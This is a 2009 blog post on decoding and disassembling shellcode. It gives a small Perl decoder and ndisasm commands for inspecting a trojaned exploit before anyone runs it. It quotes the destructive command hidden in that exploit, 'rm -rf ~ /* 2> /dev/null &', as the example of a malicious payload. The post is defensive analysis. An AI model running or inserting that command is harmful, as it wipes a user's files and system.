Archive for the ‘Reverse Engineering’ Category

Decoding and Disassembling Shellcode

Saturday, July 18th, 2009

xyberpix from the SecuriTeam blog posted an entry this week about a trojaned exploit that was handed out by a supporter of the Anti-Sec movement. The blog entry in question can be found here: SecuriTeam Blogs » 0pen0wn.c = Nasty. xyberpix ran the code without first working out what it actually did. It turns out that the code executes “rm -rf ~ /* 2> /dev/null &”, which deletes the user's home directory and then everything under the root filesystem, discarding any error messages by redirecting them to /dev/null. The trailing & runs the command in the background, so the victim does not notice until it is too late. The malicious command was hidden inside a block of shellcode (a string of \x-escaped bytes), and I was curious what it was doing, so I wrote this small Perl script to decode the shellcode:


#!/usr/bin/perl
# shellcode2bin - turn "\x90\x31\xc0..." style shellcode into raw bytes
# mail: merc from the domain securitywire.com
use strict;
use warnings;

binmode(STDOUT);    # emit raw bytes, not text

while (my $line = <STDIN>)
{
  chomp($line);
  # keep only hex digits and the 'x' that introduces each byte
  $line =~ s/[^x0-9a-f]//gi;
  # every byte is an 'x' followed by exactly two hex digits; anything
  # else on the line (variable names, comments) is ignored
  while ($line =~ /x([0-9a-f]{2})/gi)
  {
    print chr(hex($1));
  }
}

To run this script, assuming you saved the code above in a file named “ShellCodeDecode” (made executable with chmod +x) and the shellcode you want to decode is in a file named “shellcode”, type this at your command prompt:


./ShellCodeDecode < shellcode > output

This extracts the shellcode bytes and writes them to a file named output. For the SecuriTeam blog entry nothing further was needed: the malicious “rm -rf ~ /* 2> /dev/null &” command was sitting in the output as plain text. For normal shellcode, however, the output is raw machine code, which you can turn back into readable assembly with a disassembler such as ndisasm, the disassembler that ships with the nasm assembler:


ndisasm -b 32 output  | less

Keep in mind that you need to know which processor the bytecode targets and disassemble for that architecture and bit size (the -b 32 above assumes 32-bit x86; use -b 64 for x86-64). ndisasm does a linear sweep from the first byte, so any data embedded in the shellcode, such as the text of a shell command, is rendered as nonsense instructions; running strings on the output file as well is a cheap way to spot that. Also remember that self-decoding shellcode only reveals its real payload at runtime, so a clean-looking listing is not proof of safety. That's it: now you can see what the bytecode would do before running it!